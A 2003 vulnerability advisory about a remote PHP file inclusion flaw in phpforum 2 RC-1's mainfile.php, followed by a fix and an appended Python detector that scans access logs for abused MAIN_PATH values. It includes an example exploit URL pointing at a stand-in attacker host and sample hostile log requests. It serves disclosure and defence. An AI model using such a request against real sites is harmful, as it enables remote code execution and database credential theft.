================================================
<------------------------------------------------>
<------------#www.bright-shadows.net#------------>
<------------------------------------------------>
<--------------#theblacksheep&erik#-------------->
<------------------------------------------------>
================================================

Advisory Information
--------------------
Advisory Name      : PHP-Include-Hack-Possibility in phpforum 2 RC-1
Author             : Marc Bromm <theblacksheep@fastmail.fm> Germany
Discovered by      : Marc Bromm <theblacksheep@fastmail.fm> Germany
Release Date       : 10 July 2003
Application        : phpforum 2 RC-1
Vendor Homepage    : http://www.phpmyforum.de/
Vendor Status      : notified
Vulnerable Versions: phpforum 2 RC-1 (maybe older)
Platforms          : OS Independent, PHP
Severity           : High

######Overview:

phpforum is a MySQL-based forum with a lot of functions.

######Exploit:

1. Exploitable file

The exploitable file is "mainfile.php". Its first two lines are:

----------------------------------------
<?php
include("$MAIN_PATH/config.php"); //Configuration
----------------------------------------

$MAIN_PATH is taken from the request, so it can be set to any value. For example:

-> www.victim.com/forum/mainfile.php?MAIN_PATH=http://www.attack.com

All that is then needed is a "config.php" file on that host containing the code to execute. This way one can, for example, read the SQL server username and password, which are stored in the "config.inc.php" file.

Note that the attacking webserver (evilhost) must not be running PHP, otherwise the code is executed on the attacking machine rather than on the target machine and only its output is included.

######Solution:

Change

-----------------------------------
include("$MAIN_PATH/config.php"); //Configuration
-----------------------------------

to

-----------------------------------
include("config.php"); //Configuration
-----------------------------------

because the config file is in the same folder as mainfile.php, so there is no reason to build the path from a variable.

Greetz to: Erik, (O_o)oOoOoOo.
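For sites that cannot patch immediately, the inclusion attempts described above are easy to spot in the web server access log, since the attacker-controlled $MAIN_PATH value appears in the query string. The following detector is an added example written for this advisory, not code from the phpforum project; the access log lines it scans are constructed samples, and the path-traversal check generalizes beyond the remote-URL case the advisory shows.

```python
"""Flag requests that abuse the MAIN_PATH parameter of phpforum's mainfile.php.
Added example for this advisory; the log lines below are constructed samples."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined" log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A MAIN_PATH value is suspicious if it names a remote resource (the case in
# the advisory) or walks out of the forum directory (added generalization).
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)

def inspect_request(target: str):
    """Return a reason string if the request abuses MAIN_PATH, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith('/mainfile.php'):
        return None
    # parse_qs percent-decodes once; unquote() again to catch double encoding.
    for value in parse_qs(parts.query, keep_blank_values=True).get('MAIN_PATH', []):
        value = unquote(value)
        if REMOTE_RE.match(value):
            return f'remote include: {value}'
        if '..' in value or value.startswith('/'):
            return f'path traversal: {value}'
    return None

def scan_log(lines):
    """Yield (client_ip, reason) for every suspicious request in the log."""
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format line; skip it
        reason = inspect_request(m.group('target'))
        if reason:
            yield m.group('ip'), reason

# Constructed sample log (documentation IP ranges), mirroring the advisory's request.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jul/2003:12:00:01 +0200] "GET /forum/mainfile.php HTTP/1.1" 200 4096',
    '198.51.100.7 - - [10/Jul/2003:12:00:05 +0200] "GET /forum/mainfile.php?MAIN_PATH=http://www.attack.com HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jul/2003:12:00:09 +0200] "GET /forum/mainfile.php?MAIN_PATH=..%2F..%2F HTTP/1.1" 200 512',
    '203.0.113.4 - - [10/Jul/2003:12:01:00 +0200] "GET /forum/index.php?id=3 HTTP/1.1" 200 2048',
]

if __name__ == '__main__':
    for ip, reason in scan_log(SAMPLE_LOG):
        print(ip, reason)
```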
-- theblacksheep@fastmail.fm -- http://www.fastmail.fm - mmm... Fastmail...